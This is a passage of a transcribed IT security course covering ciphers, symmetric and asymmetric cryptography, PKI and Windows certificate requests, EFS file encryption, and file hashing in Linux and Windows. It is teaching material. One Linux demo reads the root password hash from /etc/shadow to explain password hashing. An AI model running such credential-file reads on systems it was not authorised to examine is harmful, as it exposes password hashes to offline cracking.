sender would have possession of a private key. And only that private key is used to create a digital signature.
And no one else would have that private key. Hashing is used to verify data integrity. If a change is made to
data, then when we compute a hash, it will not match an original hash taken prior. So we know that something has changed.
In cryptography, there are some terms that we have to get to know very well, one of which is plain text. This is
data that hasn't yet been encrypted. Ciphertext is encrypted plain text. So it's the result of feeding plain text to
an algorithm with a key. Encryption and decryption might require a single key, a symmetric key, or two keys
that are mathematically related – a public and private key pair – depending on the algorithm being used.
Ciphertext gets derived by taking plain text – seen here as Hello World! – combining it with a key, which we
see on the screen, [The key displayed on the screen is Q#$TAH$kskk3g2-.] and feeding that into an algorithm.
The result on the other end of the algorithm is our encrypted ciphertext. [The ciphertext is Gh%*_+!3BAL3.]
Cryptographic algorithms are also called ciphers. Essentially, they are mathematical formulas. Data and a key
are fed into the algorithm to result in the ciphertext. There are many IT solutions that allow the configuration
of specific ciphers that are to be used such as within a web browser or when configuring a VPN tunnel and so
on.
Stream ciphers encrypt message bits or bytes individually. And they're generally considered faster than their
counterpart block ciphers, which we'll talk about in a moment. However, stream ciphers don't provide
authenticity verification of a message. So examples of stream ciphers include RC4. This algorithm or stream
cipher is used with Wired Equivalent Privacy or WEP as well as Wi-Fi Protected Access – WPA.
However, it is considered vulnerable. So it shouldn't be used. Block ciphers encrypt blocks of data many bytes
together at once as opposed to bits or bytes individually like stream ciphers do. So, as a result, padding might
be required to ensure that blocks are always the same size. Examples of block ciphers include the Data Encryption Standard or DES, 3DES, the Advanced Encryption Standard or AES, Blowfish, and Twofish.
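To make the stream cipher idea concrete, here's a minimal, purely illustrative sketch in Python (an assumption – Python isn't used in this course, and the keystream below is a toy, not a real cipher like RC4). Each plaintext byte is XORed with a keystream byte, and because XOR is its own inverse, decryption is the same operation with the same keystream:

    import random

    def toy_stream_cipher(data: bytes, seed: int) -> bytes:
        # Derive a repeatable keystream from a shared seed and XOR it, byte by byte, with the data.
        keystream = random.Random(seed)
        return bytes(b ^ keystream.randrange(256) for b in data)

    ciphertext = toy_stream_cipher(b"Hello World!", seed=42)   # encrypt
    print(toy_stream_cipher(ciphertext, seed=42))              # decrypt: b'Hello World!'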
With symmetric encryption and decryption, one key encrypts and decrypts. It is the same key. With
asymmetric encryption and decryption, we have mathematically related key pairs where the public key is used
to encrypt and the related private key can be used to decrypt a message. Keys have various attributes, such as length. And the shorter the key, the more susceptible it would be to some kind of a brute-force attack.
Now a brute force attack attempts every possible key. If we look at DES, it has a 56-bit key length. And it has
been proven breakable. However, AES 256-bit on the other hand has not yet been proven breakable. Other
types of attacks include a known plain text attack where the attacker knows some or all of the original plain
text before it resulted in ciphertext. Now, once that gets cracked, the attacker could then decrypt other
messages once they learn of the key.
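As a rough back-of-the-envelope illustration of why key length matters to brute-force attacks – this is just arithmetic, shown here in Python purely for convenience – compare the number of possible 56-bit and 256-bit keys:

    des_keyspace = 2 ** 56     # roughly 7.2 x 10^16 possible keys – exhaustible with modern hardware
    aes_keyspace = 2 ** 256    # roughly 1.2 x 10^77 possible keys – far beyond any practical brute force

    print(des_keyspace)
    print(aes_keyspace)
    print(aes_keyspace // des_keyspace)   # the AES-256 keyspace is 2^200 times larger than the DES keyspace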
[Topic title: Symmetric Cryptography. The presenter is Dan Lachance.] In this video, we'll talk about
symmetric cryptography. Symmetric cryptography uses a single private key, and this is often called a secret
key or a shared secret. This secret key is used to both encrypt and decrypt. So there aren't two keys, there is
only one. There is, however, a lack of authentication, although a hashing algorithm can be used separately to verify data integrity.
Generally, symmetric cryptographic algorithms are considered to execute faster than asymmetric algorithms,
which use different yet related keys. Symmetric cryptography is used in many ways including with Wi-Fi
preshared keys such as those used with WPA and WPA2 wireless security. But symmetric cryptography can
also be used with file encryption or other standards such as IPsec.
Consider the example of a Wi-Fi router with clients that need to connect to the wireless network. So the
administrator then needs to configure a preshared key on the Wi-Fi router. Connecting devices then must know
and configure that same preshared key in order to connect and be authenticated with the access point. Here, in
the configuration of a wireless router, [The ASUS Wireless Router RT-N66U web page is open. It includes
several sections such as General, Advanced Settings, and System Status.] we can see over on the right the
name of the wireless network or the SSID. [The name of the wireless network or the SSID is linksys. It is
displayed under the System Status section.] But we can also see the Authentication Method, which in this case
is set to WPA2-Personal.
Now, using WPA2-Personal or WPA-Personal requires the configuration of a key. Now the key that we configure must be known by connecting clients, so this is symmetric encryption. The difficulty with symmetric cryptography is how to safely distribute keys on a large scale, such as over the Internet. How do we get the key to everybody? Because all that a malicious user needs is the key. If they intercept a transmission – such as an unencrypted e-mail message containing the key – then they can decrypt all messages.
The other difficulty is that the sender and receiver must have the same key to communicate. And possession of
the key means that decryption is possible for all messages. Examples of symmetric algorithms include RC4,
DES, 3DES, Blowfish, and AES. In this video, we discussed symmetric cryptography.
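As a minimal sketch of symmetric encryption – assuming Python and the third-party cryptography package, neither of which is part of this course – the same key object both encrypts and decrypts, so anyone who obtains the key can read every message:

    from cryptography.fernet import Fernet

    key = Fernet.generate_key()   # the single shared secret – sender and receiver must both possess it
    cipher = Fernet(key)          # Fernet wraps AES, a symmetric block cipher

    token = cipher.encrypt(b"Hello World!")   # encrypt with the shared key
    print(cipher.decrypt(token))              # decrypt with the very same key: b'Hello World!'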
[Topic title: Asymmetric Cryptography. The presenter is Dan Lachance.] In this video, I'll go over asymmetric
cryptography. Asymmetric cryptography uses two mathematically related keys – public key and the private
key. The public key is used for encryption, and the mathematically related private key decrypts. Asymmetric
cryptography also provides authentication, so we can be assured that a transmission or a message comes from
who it says it came from.
Data integrity is a part of asymmetric cryptography also, so we can detect if changes have been made to data.
However, it's generally considered slower than symmetric algorithms. With asymmetric cryptography, the
problem of distributing keys securely even on a large scale disappears. And that is a big problem with
symmetric cryptography since the same key is used for everything. The public key can be shared with
everyone. Private keys, however, are a different story – they need to be kept secret by the owner.
Keys can also be exported from a PKI or Public Key Infrastructure certificate that's issued. Now, if we're going
to export a private key, then it needs to be stored in a password-protected file. For instance, here in Internet
Explorer, I'm going to open up my Tools menu and I'm going to go all the way down to Internet options at the
bottom. [The Internet Options dialog box opens.] Then I'll go to the Content tab where I can click the
Certificates button. [The Certificates dialog box opens.]
I'm going to go to the Personal tab here where I'm going to select a personal certificate that was issued to
myself. Now that could be issued by a Certificate Authority, or a CA. Or in some cases, such as with Windows, the first time you encrypt a file using Encrypting File System – EFS – if you don't already have a user certificate, one will be created for you.
However the certificate came to be, when you select it here, you have the option of choosing Export down at the bottom. [He clicks the Export button and the Certificate Export Wizard opens.] When you go through the
wizard, you have the option of exporting the private key. Now the public key is exported normally. And you
might export the public key from your certificate to give to another user so that they can encrypt, for example,
e-mail messages that they send to you because you will decrypt it with your private key.
Let's dive into the e-mail encryption example a bit further. Pictured here on the left, we have user Bob and on
the right we have user Alice. In this example, Bob wants to send an encrypted e-mail message to Alice. So
what happens is that Bob encrypts the message to Alice with Alice's public key. So one way or another, Bob
has to possess Alice's public key.
Now perhaps Alice exported it and provided it to Bob or perhaps Bob was able to read that from a centralized
address book, there are many ways to acquire public keys. And it's okay to share public keys with everybody.
That's why they are called public. So, again, Bob encrypts the message to Alice with her public key. Alice, on
the other hand, will decrypt the message with her related private key to which only she should have access.
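Here's a minimal sketch of that Bob-and-Alice exchange – assuming Python and the third-party cryptography package, used purely for illustration – where encryption uses Alice's public key and only her related private key can decrypt:

    from cryptography.hazmat.primitives.asymmetric import rsa, padding
    from cryptography.hazmat.primitives import hashes

    # Alice generates a mathematically related key pair and keeps the private half secret.
    alice_private = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    alice_public = alice_private.public_key()   # this half can be shared with everyone, including Bob

    oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                        algorithm=hashes.SHA256(), label=None)

    ciphertext = alice_public.encrypt(b"Meet at noon", oaep)    # Bob encrypts with Alice's public key
    print(alice_private.decrypt(ciphertext, oaep))              # only Alice's private key can decrypt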
These keys are stored in a PKI or X.509 certificate. And these certificates are issued by a Certificate Authority
or CA. Here the Certificate Authority could be within your company or it might be a third party out on the Internet. However, PKI certificates, and by extension their keys, eventually expire. Key pairs that are issued to users – or to devices or applications – are unique.
However, in some cases, they could be susceptible to a man-in-the-middle attack. Now, with the man-in-the-
middle attack, we've got an impersonation of an entity that's already communicating with another party. So
what could happen is that an impersonated public key could be provided to an unsuspecting sender.
So a public key, of course, is used to send encrypted data. And, if we are the malicious user in this example, we could be fooling someone into sending us sensitive information while the sender thinks it's going to someone else and is encrypted, and therefore protected. Examples of asymmetric cryptographic algorithms include RSA,
Diffie-Hellman, and ECC.
Objectives
[Topic title: Public Key Infrastructure. The presenter is Dan Lachance.] In this video, I'll discuss Public Key
Infrastructure. Public Key Infrastructure is often called PKI. It's a hierarchy of digital security certificates that
are also sometimes called X.509 certificates. These certificates are issued by a Certificate Authority, otherwise
called a CA. And they get issued to a user or a device or an application. Certificates among other things
contain a unique public and private key pair that are used for things like encryption, decryption, and the
creation and verification of digital signatures.
With the Public Key Infrastructure at the top of the hierarchy, you've got the Certificate Authority, or CA.
Under which, you could optionally have subordinate Certificate Authorities. So, for instance, in a large
organization, we might have a CA for the company, but we might have a subordinate Certificate Authority for
different parts of the world.
Now, under the subordinate Certificate Authority, we actually have issued PKI certificates for users, devices,
or applications. However, take note that the Certificate Authority itself could directly issue user, device, and
application PKI certificates. Now something that we have to be careful of is the Certificate Authority being
untrusted.
If this is a trusted third-party Internet CA such as Symantec, then most software such as web browsers will
automatically trust that signer. However, if you build your own Certificate Authority within your company and
you issue PKI certificates – for example – to secure an intranet web server, your devices will not trust the
signature on that web server certificate. So therefore, there is a bit of extra configuration when you use an
internal Certificate Authority.
The other thing to consider is that the top-level or root CA should be taken offline and kept offline for security
purposes. The reason is that, if the root Certificate Authority were to be compromised, all certificates underneath it – which is everything in the hierarchy – would also be considered compromised.
So root-level or top-level CAs should be taken offline. Certificates themselves have an expiry date. This is set
by the issuing CA. And it can differ. It might be one year, might be five years, could be eight years. Either
way, upon expiration, the certificate can't be used any longer. So, before expiration, the certificate can be
renewed. So it doesn't have to be completely reissued.
A compromised PKI certificate can be revoked. So therefore, the certificate can no longer be used. Inside a
digital PKI certificate, we have many things including the digital signature of the signing Certificate Authority
that issued the certificate. There's also the subject identity where for a user it might be their e-mail address or
for a web site it might be the URL to that site.
There is also an expiration date within a PKI certificate as well as, of course, a unique public and private key
pair. Additionally, you'll have key usage information that defines how keys within the certificate are to be
used. There might also be the location of a certificate revocation list or CRL. This is usually in the form of a
URL. In other words, it's a site where we can pull down a list of serial numbers for revoked PKI certificates
that are not to be trusted.
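As an illustration of what's inside a certificate, here's a small sketch – assuming Python with a recent version of the third-party cryptography package, and a hypothetical PEM file name – that loads a certificate and prints a few of the fields just described:

    from cryptography import x509

    # "server.pem" is a hypothetical file holding a PEM-encoded certificate.
    with open("server.pem", "rb") as f:
        cert = x509.load_pem_x509_certificate(f.read())

    print(cert.issuer.rfc4514_string())    # the signing Certificate Authority
    print(cert.subject.rfc4514_string())   # the subject identity, e.g. CN=www.example.com
    print(cert.not_valid_after)            # the expiration date set by the issuing CA
    print(cert.serial_number)              # the serial number a CRL would list if the cert were revoked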
Third-party certificates are often trusted on the Internet. However, self-signed certificates are not trusted by default. And that's back to our example of having your own CA within your company. So devices and applications then would have to be configured to trust that self-signed CA. Certificates can also be issued through something
called auto-enrollment. And this is often used in a closed or corporate enterprise type of environment.
For example, in a Microsoft Active Directory network, we can use Group Policy to configure auto-enrollment
once devices refresh Group Policy. This way we have a centralized and trusted way to issue certificates on a
larger enterprise scale. Here, in my web browser, if I – in this case – go to the Tools menu because it's Internet
Explorer and all the way down to Internet options, [The Internet Options dialog box opens.] then go to the
Content tab, I can then click the Certificates button. [The Certificates dialog box opens. It includes the
Intermediate Certification Authorities and Trusted Root Certification Authorities tabs.]
Now interestingly, I can see Intermediate Certification Authorities whose signatures are trusted by this web
browser. [Some of these authorities are GlobalSign Root CA, AddTrust External CA, and COMODO RSA
Certificate.] I can also go to trusted roots – in other words, the top of the hierarchy. Here I have an
alphabetical list of trusted certificate root authorities that can issue certificates. [Some of these authorities are
AddTrust External CA Root, azuregateway-838c8, Baltimore CyberTrust Root, and Certum CA.] So, for
example, if we trust the Baltimore CyberTrust Root listed here in Internet Explorer, then by extension we trust
every certificate issued under that hierarchy.
Now, if you connect – for example – to a web site that is secured over HTTPS with an SSL or a TLS
certificate, your browser will be consulted to verify whether or not it should trust the signature. And, if it
doesn't, it will pop up with a message that tells the user that they probably should not proceed to that site because the certificate is not considered to be valid. Notice here that we have Import and Export options. [He points to the Import and Export buttons in the Certificates dialog box.] So, for instance, we could import a trusted root certificate that we have created within our own environment. In this video, we discussed
Public Key Infrastructure.
Objectives
[Topic title: Request a PKI Certificate from a Windows CA. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to request a PKI certificate from a Windows Certificate Authority. A Certificate Authority, or
CA, is at the top of the PKI hierarchy, and its purpose is to issue PKI certificates. Or, if it doesn't do it directly,
then it will create subordinate CAs, which in turn can issue certificates. Either way, before you can configure a
certificate to be used for something like a web server as in our example, you have to know some details.
So, before we can request a PKI certificate to secure an HTTPS web server, we need to know the name of the
server. So here at the PowerShell command line, I'm going to ping the name of the server for which I want to
issue a PKI certificate. It's called srv2012-1, and the full name is srv2012-1.fakedomain.local.
So you need to know some of these details before you can request a PKI certificate. In the same way, if you're
requesting a user certificate, maybe to digitally sign and encrypt e-mail, you would have to know some details –
things like the user e-mail address and so on. So we now know that we have a valid name that is responding on
the network.
So, at this point, let's go to the Start menu here on our server and type cert – c-e-r-t. We're going to start the
Certification Authority tool because this server already has a CA configured. Now, in the Certification
Authority tool [The certsrv window opens. The window is divided into two sections. The section on the left
contains the fakedomain-SRV2012-1-CA node, which further includes the Revoked Certificates and Certificate
Templates folders. The section on the right displays the content of the folder selected in the left section.] on the
left, I'm going to expand the name of my CA and I'm going to choose Certificate Templates. [The contents of
the Certificate Templates folder are displayed in the section on the right. It displays a list of templates and
their intended purposes.] Now we don't have a web server template here from which we can issue PKI
certificates.
So, to do that, I'm going to right-click on Certificate Templates on the left and choose Manage, which opens up
a new tool called the Certificate Templates Console. [This window is divided into three sections. The section in
the left contains the Certificate Templates node, which is selected by default. A list of generic templates is
displayed in the middle section. The section on the right is titled Actions.] Now, in this list, we've got a bunch
of generic templates, one of which in the Ws is called Web Server. So I want to right-click on that one and
choose Duplicate Template. [The Properties of New Template dialog box opens. It includes the General,
Subject Name, Cryptography, and Security tabs. At the bottom of the dialog box are several buttons such as
OK and Cancel.]
And, under the General tab, I'm going to give this a new name. It's going to be called Custom Web Server
Template. [He enters this name in the Template display name text box.] Now this is the template from which PKI certificates will be generated, of course. Down below, there are many other things that I can configure, such as the Validity
period of the certificate. Here it's set to 2 years, which is fine. Under Subject Name here – in this case, the
name of the server that will receive the certificate – it's set to Supply in the request.
So that means that when we request the certificate, we'll have to supply the name. There are many other things
we could do here. For instance, under Cryptography, I might set the Minimum key size because remember
when a PKI certificate gets issued, there is a mathematically related public and private key pair.
So I'm going to go into the Security tab where I'm going to click the Add button. [The Select Users,
Computers, Service Accounts, or Groups dialog box opens. It includes the Object Types and Check Names
buttons.] And, for Object types, [He clicks the Object Types button and the Object Types dialog box opens. It
includes the Computers checkbox.] I'll select Computers. I'll click OK. Then I'm going to type in the name of
the server that I want to be able to have privileges to request a certificate from these templates. So that server is
called srv2012-1. [He enters this name in the Enter the object names to select text box under the Select Users,
Computers, Service Accounts, or Groups dialog box] I'll check the name and OK it. And, having that name
selected here in the ACL for this template, I'm going to make sure I turn on Enroll under the Allow
column. [He selects the Allow checkbox for the Enroll permission under the Permissions for SRV2012-1
section of the Security tabbed page.]
So SRV2012-1 is allowed to Enroll and essentially ask for a certificate based on this template. I'll click OK.
And I'll Close the Certificate Templates Console. [He switches back to the certsrv window.] Now the thing is
our Custom Web Server Template isn't showing up on the right, and that's normal. What you need to do to
make it usable is you need to right-click on Certificate Templates on the left. You need to go to New -
Certificate Template to Issue and then choose it from this list. There it is – Custom Web Server Template. We
are good to go.
Now let's play the part of the server that will request a certificate based on that template, which usually would
be a different computer. But, in our example, we'll just use the same computer. It won't make a difference. So
we're going to go ahead and go to the Start menu and type mmc.exe to start the Microsoft Management
Console tool. [The Console1 window opens. It is divided into three sections. The section in the left contains the
Console Root folder. The section in the middle displays the content of the folder selected in the section on the
left. The section on the right is titled Actions.] Now what I'm going to do here is add the certificate snap-in, so
we can work with certificates on this computer.
To make that happen, I'm going to go to the File menu. I'm going to choose Add/Remove Snap-in. [The Add
or Remove Snap-ins dialog box opens. It includes two list boxes. The first list box displays a list of available
snap-ins. The second list box displays a list of selected snap-ins. There is an Add button in the middle of these
list boxes that adds the selected snap-in from the first list box to the second list box.] I'm going to choose
Certificates on the left. Then I'll click Add in the middle. [A wizard opens. The first page is titled Certificates
snap-in. It contains a section, which is titled This snap-in will always manage certificates for. This section
includes the Computer account radio button. At the bottom are three buttons: Back, Next, and Cancel.] And
I'll choose Computer account, Next. [The next page is titled Select Computer. It includes a section that is titled
This snap-in will always manage. It further includes the Local computer radio button.] I'll leave it on Local
computer. And I'll click Finish. Finally, I'll click OK [in the Add or Remove Snap-ins dialog box] . And now
you can see that we've got the Certificates tool available or added to MMC. [The Certificates (Local
Computer) node gets added under the Console Root folder in the left section of the Console1 window.] So we
can now work with certificates for this computer.
In the left-hand navigator, [The Certificates (Local Computer) node further includes folders such as Personal
and Enterprise Trust.] I'm going to expand Personal, then I'm going to click Certificates where on the right, I
will see any existing certificates issued to this host. [The content of the Certificates subfolder is displayed in
the middle section.] To request a new certificate in the left-hand navigator, I will right-click on Certificates
and choose All Tasks - Request New Certificate. On the Certificate Enrollment screen – which is a wizard – I'll
click Next and Next again. And here we can see we can choose our Custom Web Server Template, [He selects
the Custom Web Server Template checkbox in the Request Certificates page.] but it says more information is
required.
So I'm going to click on that link. [The Certificate Properties dialog box opens, which includes the Subject
tab. It further includes the Subject name and Alternative name sections. Both sections contain a Type drop-
down list box and a Value text box. There are two buttons, Add and Remove, adjacent to both these
sections.] Now, for the Common name, I'm going to type in the name of my server – srv2012-1, [He types this
in the Value text box under the Subject name section.] and I will click Add. And, for the Alternative name
down below, I'll choose DNS [He selects this value in the Type drop-down list box.] and I'll put in srv2012-
1.fakedomain.local. [He types this in the Value text box.] Now we ping that at the onset of this demonstration
to make sure it was valid, and it was. I'll click Add. So essentially, this is going to be added into the PKI
certificate that gets issued for this server. So I'll click OK, and then I'll click the Enroll button. [This button is
present at the bottom of the Request Certificates page of the Certificate Enrollment wizard.]
And now it says the STATUS: Succeeded. So therefore I'll click Finish. I can see that I've got a certificate now
in this list that's been issued to this server from the template. [This certificate appears in the middle section of
the Console1 window.] I can see the Expiration Date. I can see the Intended Purposes. And actually, I could
even double-click on that certificate where I might even go into Details to see things like what's the subject
name. There is the subject name – the name of the server. If I go further down, I can even see things like the
Subject Alternative Name is the DNS name of the server of course and so on. So let's actually use that
certificate. And this host happens also to be a web server. We're going to do it on the same computer again.
In my Start menu, I'm going to type iis so that I can start the Internet Information Services (IIS) Manager tool
to manage web sites. It also actually lets me manage FTP sites. [The Internet Information (IIS) Manager
window opens. There is a section on the left, which is titled Connections. It includes the Start page node,
which further includes the SRV2012-1 (FAKEDOMAIN\Administrator) subnode. This subnode includes the
Sites folder, which further includes the Default Web Site option.] But we're worried about our Default Web
Site here and securing it with HTTPS. So you need a certificate for that. Well, we've got a certificate.
I'm going to right-click on the Default Web Site and choose Edit Bindings. [The Site Bindings dialog box
opens. It includes the Add and Edit buttons.] Here you can see our web server has a Port 80 binding, but not a
Port 443 binding, which is normally used for secured connections over HTTPS. So I'm going to click the Add
button. [The Add Site Binding dialog box opens. It includes the Type and IP address drop-down list boxes. It
also includes the Port and Host name text boxes.] And, from the Type drop-down list, I'll choose
https. [Another drop-down list box appears, which is titled SSL certificate.] Notice it's selected Port 443.
Now I have to choose an SSL certificate. So I'm going to go down and choose the one that we just issued here.
Here is the server's common name – srv2012-1. And I will click OK and Close. Now, if I start my web browser
– so I'm going to start Internet Explorer – and if I try to connect to https://srv2012-1, in this
case, .fakedomain.local/, the full DNS name, it takes us right to it. So now our server has an encrypted
connection through the certificate that we requested from the Windows Certificate Authority.
[Topic title: Use Windows EFS File Encryption. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to use Windows encrypting file system. Encrypting file system, or EFS, is built into the
Windows operating system. And it allows users to encrypt files and folders. So that user then must be
successfully authenticated before decryption can occur. So therefore, it's based on the user unlike BitLocker,
which is really tied to the machine and protects data at rest – that is, data while the machine is turned off and the disk volume is still encrypted.
So the first thing we should always do is get some kind of context. And what that means here is I'm going to
type whoami to see who I'm currently logged in as. [The presenter types this in the PowerShell window.] In
this case, I'm logged in as the administrator account in the domain called fakedomain. Now this is important
because any files that I encrypt will be encrypted with whoever I'm currently authenticated as. So now that we
know that information, let's go ahead and take a look at what we need to do to make EFS file encryption work.
I'm going to open up Windows Explorer where I'm going to take a look at a sample file on drive I. So let me
just go into the UserDataFiles folder - Projects. Now I could encrypt an entire folder, but here I'm just going to
choose a single file called Project_A. I'm going to right-click on that file and choose Properties. [The
Project_A Properties dialog box opens.] In the Properties, I'm going to go down under the Advanced
button [He clicks the Advanced button and the Advanced Attributes dialog box opens.] where I can see it's not
currently encrypted, because there is no checkmark for the option that says Encrypt contents to secure data.
Now interestingly from the command line, I could also use the cipher.exe tool. So I'll just put a /? after that to
work with EFS encryption here at the command line. [He executes the cipher.exe /? command in the
PowerShell window.] And that's definitely useful if you want to work with things in an automated fashion, if
you want to repeat actions on multiple machines. However, I'm going to Minimize that screen. We're going to
use the GUI here to encrypt this file with EFS. [He switches back to the Advanced Attributes dialog box and
selects the Encrypt contents to secure data checkbox.]
So really it's just a matter of going into the Properties, going into the Advanced button, and turning on this
checkmark to encrypt the contents. Now, when I click OK the second time, [He clicks the OK button in the
Project_A Properties dialog box and the Encryption Warning dialog box opens.] it asks if I would like to
Encrypt the file and its parent folder or just the file. Well, I'm going to choose Encrypt the file only, and then
I'll turn on the checkmark to always encrypt only the file. And I'll click OK. Now what this means is that any new
files placed into this folder will not be automatically encrypted. So that's fine.
I'm going to go ahead and OK out of that. And notice that the color of the file has changed because it's now
encrypted. Now, to the user that encrypted it, everything is completely transparent other than the color
changing. If I would open up that file by double-clicking, it just opens up as per usual, whereas anyone else is
going to get an access denied message.
Do take note though, that if you are working on a project – for example – and you want other people to be able
to decrypt that same file, it is possible. So, for instance, if I right-click on the file and go under Properties and
then go down under Advanced and then click on Details, [He clicks the Details button in the Advanced
Attributes dialog box and the User Access to Project_A dialog box opens.] from here I could click Add to add
other people that should be able to decrypt the same file. [He clicks the Add button and the Encrypting File
System dialog box opens.]
Now, in order for me to do that, I have to make sure I have access to their certificates. Now certificates –
what's that about? Well, in the background, what encrypting file system is doing is using a PKI certificate
issued to the user for encryption. Now either you can control that yourself or if the user doesn't already have a
PKI certificate the first time they encrypt a file, one will be auto-generated, which is what has happened here.
Let's go take a look at that. So, to verify that this is true, I'm going to start the Microsoft Management Console
or MMC. And we're going to add the certificate snap-in and look at the user certificate. So, in my Start menu,
I'm going to type mmc.exe. There it is. So I'm going to click on it. [He opens the Console1 window.] And I'll
maximize it. And I'll go to File menu. I'll choose Add/Remove Snap-in. [The Add or Remove Snap-ins dialog
box opens. It includes two list boxes. The first list box displays a list of available snap-ins. The second list box
displays a list of selected snap-ins. There is an Add button in the middle of these list boxes that adds the
selected snap-in from the first list box to the second list box.] On the left, I'll choose Certificates. Then I'll
click Add. [The Certificates snap-in dialog box opens that contains a section named This snap-in will always
manage certificates for. This section includes the My user account radio button.] And I want it for the user
account. So I'll leave it on My user account, Finish, and OK.
Alright, finally, after all those steps in our console on the left, we can see certificates for the current user. So I
will expand that as well as expanding Personal. Then I'll click on Certificates on the left. [He selects the
Certificates subfolder in the left section of the Console1 window and its content is displayed in the middle
section.] Notice here, I've got a certificate issued to my user account, Administrator. Now, because I've got a
Certificate Authority installed, that was issued by my Certificate Authority in the Active Directory domain.
And notice that the Expiration Date is listed here. And notice, this is the key here, no pun intended – the
Intended Purposes for encrypting file system. So this certificate then is what is used to encrypt and decrypt
files based on this user account. So it's crucial that that be backed up.
Now the safety net in an Active Directory domain environment – should PKI certificates be corrupted or not backed up and workstations destroyed – is that the domain administrator is, by default, an EFS recovery agent. And you can configure other accounts as recovery agents in Group Policy. And what that means then is that the
EFS recovery agent can decrypt anyone's data if absolutely required. In this video, we learned how to use
Windows EFS file encryption.
[Topic title: Fingerprinting, Hashing. The presenter is Dan Lachance.] In this video, I'll talk about
fingerprinting and hashing. A hash is a short value that uniquely represents original data. Hashing uses one-
way functions that are not feasibly reversed without knowledge of the original data. Hashing is also an
efficient way of detecting modification, especially across the network between multiple nodes without having
to transmit all of the original data. Instead, hashes can be computed on different devices. And the hashes
themselves – which are much smaller potentially than the data they are based on – are what would be sent and
compared over the network.
Hashes are normally at least 128 bits long. And they are sometimes called message digests. We can compute a
hash of data and then compare that to an earlier hash of that data to detect if any changes have occurred. And
this is actually done quite often with forensic evidence gathering to ensure that prior to forensic experts
conducting analysis on seized information, we have a record of its original state.
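As a minimal sketch of that compare-the-hashes idea – shown with Python's standard hashlib, which is an assumption rather than anything used in this course – any change to the data produces a completely different digest:

    from hashlib import sha256

    original = b"This is sample data on line one."
    baseline = sha256(original).hexdigest()            # record the hash of the original data

    tampered = b"This is sample data on line one!"     # one character changed
    print(baseline == sha256(original).hexdigest())    # True  - data unchanged
    print(baseline == sha256(tampered).hexdigest())    # False - modification detected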
Ways that hashing gets used include password hashing in the UNIX and Linux /etc/shadow file. Here, in
Linux, I'm going to type cat /etc/shadow. [The presenter executes this command in the root@kali command
prompt window.] In UNIX and Linux environments, the shadow file will have user account information along
with hashed passwords. Now I'm going to clear the screen and bring up that command again with the up arrow.
But I'm going to pipe it to grep, which is a line filter. And we're going to look for the root user account. [He
executes the cat /etc/shadow | grep root command.]
What you're going to notice here, in the second field – because the delimiter is a colon – is a hashed version of the root password. Now you can't enter the hash to authenticate as that user. That's not going to work. However, upon logon, the password that's entered is fed through a hashing algorithm. And, if it results in this unique hash, then the password is correct.
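To illustrate that logon check – a deliberately simplified sketch in Python; real /etc/shadow entries use salted, crypt-style hashes such as SHA-512-crypt, and the salt and password here are made up – the candidate password is hashed and the digests are compared, so the password itself never needs to be stored:

    from hashlib import sha512

    salt = "xyz123"   # hypothetical salt stored alongside the hash
    stored_hash = sha512((salt + "S3cretPassw0rd").encode()).hexdigest()

    def check_password(candidate: str) -> bool:
        # Hash the candidate the same way and compare digests.
        return sha512((salt + candidate).encode()).hexdigest() == stored_hash

    print(check_password("S3cretPassw0rd"))   # True
    print(check_password("guess"))            # False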
Hashing is also often used for file integrity verification. We can also verify that downloaded Internet files
haven't been corrupted during download by doing a hash after we've downloaded it on our local machine and
comparing it to a hash published on a web site. For instance, the shasum command-line tool can be used in
Mac OS X to ensure downloaded files have not been corrupted or tampered with. You'll learn how to perform
hashing in Linux and Windows in other demonstrations. Common hashing algorithms include MD5 – that's
message digest 5; RIPEMD; and the secure hashing algorithm family such as SHA1, SHA2, and SHA3. In this
video, we discussed fingerprinting and hashing.
[Topic title: File Hashing in Linux. The presenter is Dan Lachance.]
In this video, I'll demonstrate how to perform file hashing in the Linux operating system. Hashing allows us to
run some kind of a computation on originating data to see if it's changed since the last time we ran that same
computation. Here, in Linux, I'm in my data directory where I'm going to type ls to list files. I can see I've got a
file here called log1.txt. So why don't we take a look at what's inside it using the cat command?
[The presenter executes the cat log1.txt command.]
So there's a single line of text that says, "This is sample data on line one." What I'm now going to do is use the
md5sum command, spacebar, then I'll put in the name of my file. And notice that I get the resultant hash.
[He executes the md5sum log1.txt command.]
Now what I could do is use output redirection to store this hashed information in a file. So, for instance, I'll use
the up arrow key to bring up that command. I'll use a greater than sign, which is my output redirection symbol.
And maybe in the current directory, I'm going to make a file called log1hash.
[He executes the md5sum log1.txt > log1hash command.]
Now, when I press Enter, I don't get the output on the screen anymore, but I do have a log1hash file. If I cat the
log1hash file to view the contents within it, then I'm going to see that I've got my hash information along with
the filename.
[Video description begins] He executes the cat log1hash command. [Video description ends]
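As a quick aside – a hedged sketch using the same file names as this demo – md5sum can also do the comparison against that stored file for us:

  # Verify log1.txt against the checksum recorded in log1hash; prints OK or FAILED
  md5sum -c log1hash
  # The exit status is non-zero on a mismatch, which is handy in scripts
  md5sum -c log1hash || echo "log1.txt has changed since the hash was recorded"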
So let's go ahead then and make a change to the contents within log1.txt. To do that, I will use the vi text editor, so vi log1.txt. Now, in here, I'm going to go to the end of the line and press Insert. And I'm going to press Enter, where I'll type "This is line two." I'll then press Esc so that I'm no longer in INSERT mode. Now I'm in command mode, so things I type don't become part of the file; they're interpreted as commands by the vi editor. So I'm going to type :wq. And you'll see that showed up in the bottom-left, where w means write – write the changes to the file – and q means quit. So now I'm going to use my up arrow key to bring back the md5sum command I originally ran against log1.txt. Let's go ahead and run it. Now notice that this time
[Video description begins] He again executes the md5sum log1.txt command. [Video description ends]
if you look carefully at the resultant hash, it begins with c2d2. That of course is different from the original hash, which began with 53d4. So the point is this: hashing lets us detect when a change has occurred – in this case, to a file in the Linux filesystem. In this video, we learned how to work with file hashing in Linux.
[Topic title: File Hashing in Windows. The presenter is Dan Lachance.] In this video, I'll demonstrate how to
work with file hashing in the Windows environment. Now why would we ever want to hash a file? What is the
purpose? The purpose is to simply detect if a change has occurred since we last ran the computation that
resulted in the hash. Now, in the Windows world, we can use third-party command line and GUI tools or what
I'm going to demonstrate here is using PowerShell with the built-in Get-FileHash cmdlet. But first let's start by
typing dir.
Here we've got a working file called Project1.txt. So let's just use notepad to open that up to see what's inside
it. [The presenter executes the notepad .\Project1.txt command and the Project1.txt - Notepad window
